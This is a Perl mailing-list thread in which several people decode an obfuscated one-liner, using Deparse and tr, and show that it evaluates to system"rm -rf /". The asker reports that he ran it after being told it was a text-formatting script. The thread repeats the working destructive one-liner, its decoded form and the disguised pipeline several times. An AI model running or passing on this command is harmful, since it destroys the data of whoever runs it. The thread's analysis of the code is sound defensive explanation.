Perl tricks

[Andrei Koulik]

Can anybody explain me how this command deletes files:
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
-;;s;;$_;see'

 

[Charles DeRykus]

Can anybody explain me how this command deletes files:
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
-;;s;;$_;see'

You can use Deparse to get a clearer view:

perl -MO=Deparse
$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"-;;s;;$_;see
^D

$?->perl ? s/;s/s;;$?/ : s//=]=>%-{<-|}<&|`{/;
tr( -/:-@[-`{-})[`-{/"\-];
s//$_;/see;

The evil is lurking in the final double eval. Comment that
line and throw in a 'print' after preceding statements,

....
tr( -/:-@[-`{-})[`-{/"\-]; print;
#s//$_;/see;

Ah, the $_ that the double eval loads up with is:

system"rm--rf-/"

HTH,

 

[John W. Krahn]

Can anybody explain me how this command deletes files:
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Just change the "s;;$_;see" at the end to "print":

$ perl -le '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;print'
system"rm -rf /"


John

 

[David]

Can anybody explain me how this command deletes files:
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
-;;s;;$_;see'

translation:

$? ?
s/;s/s;;$?/
:
s//=]=>%-{<-|}<&|`{/;

tr( -/:-@[-`{-})[`-{/"\-];

s//do{
$_;
};/see;

more translation:

1. this:

$? ?
s/;s/s;;$?/
:
s//=]=>%-{<-|}<&|`{/;

essentially translate to:

$_ = '=]=>%-{<-|}<&|`{';

lookup perldoc perlvar to see what $? holds and you will know why.

2. this:

tr( -/:-@[-`{-})[`-{/"\-];

have a few components. those between '(' and ')' are characters to be translated:

' -/' means: all characters between the space and '/'
':-@' means: all characters between ':' and '@'
'[-`' means: all characters between '[' and '`'
'{-}' means: all characters between '{' and '}'

those between '[' and ']' are characters translated to:

'`-{' means: all characters between '`' and '{'
'/" \-' means just the literal characters.

so you are translating:

!"#$%&'()*+,-./:;<=>?@[\]^_`{|}
`abcdefghijklmnopqrstuvwxyz{/" -

characters from upper string to the lower string.

now notice what $_ is and plug in the translation gives $_ to be:

system"rm -rf /"

3. isn't it clear from now on?

s//do{
$_;
};/see;

'ee' bascially runs the system call via do{}.

4. question: are you going to run that to confirm what i said?

david

 

[Jay Tilton]

: Can anybody explain me how this command deletes files:
: perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
: -;;s;;$_;see'

Start by running it through the Deparse backend to get rid of some
obfuscating elements, then add some whitespace for readability.

$? ? s/;s/s;;$?/
: s//=]=>%-{<-|}<&|`{/ ;

That puts the string "=]=>%-{<-|}<&|`{" into $_ .

Beyond extra obfuscation, I don't know what "s/;s/s;;$?/" could have to
do with anything--I don't know of a circumstance where $? would hold a
true value when the program starts execution.

tr ( -/:-@[-`{-})
[`-{/" \-] ;

That alters the characters in $_.
If you print it now, it will read 'system"rm -rf /"' .

s//do { $_ };/see ;

That's just a hairy way of saying "eval $_" .

So were you aware of the code's malicious nature before running it, or
did something terrible happen?

 

[Andrei Koulik]

Thank all very much.
Yesterday I have parsed it manually how John W. Krahn does, but from
your replies I have learnt some useful things.

 

[Andrei Koulik]

Jay Tilton wrote:
......

So were you aware of the code's malicious nature before running it, or
did something terrible happen?

I was asked to debug script for text formation:

cat "test... test... test..." | perl -e
'$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

but I noted neither -n nor -p option is used so I start debug it on
behalf of news user (it doesn't own any files).
But after some steps, lines:
....
rm: /usr/bin/objcopy: Permission denied
rm: /usr/bin/objdump: Permission denied
rm: /usr/bin/ranlib: Permission denied
....
were printed. When I pressed ctrl-c the output is froze but beeping is
started and terminal didn't responsed on any keys.
I didn't knew what happened and so I had to understood what this program
actually does to detect possible injuries.

 

[Jay Tilton]

: Jay Tilton wrote:
: .....
: >
: > So were you aware of the code's malicious nature before running it, or
: > did something terrible happen?
: >
: I was asked to debug script for text formation:
:
: cat "test... test... test..." | perl -e
: '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
:
: but I noted neither -n nor -p option is used so I start debug it on
: behalf of news user (it doesn't own any files).
:
: But after some steps, lines:
: ...
: rm: /usr/bin/objcopy: Permission denied
: rm: /usr/bin/objdump: Permission denied
: rm: /usr/bin/ranlib: Permission denied
: ...
: were printed. When I pressed ctrl-c the output is froze but beeping is
: started and terminal didn't responsed on any keys.
: I didn't knew what happened and so I had to understood what this program
: actually does to detect possible injuries.

Next time you feel compelled to run a mysterious script like that, you
might want to use perl's -T switch, at the least. In this case, it
would have halted the program with an "Insecure $ENV{PATH}" error before
any mischief could begin.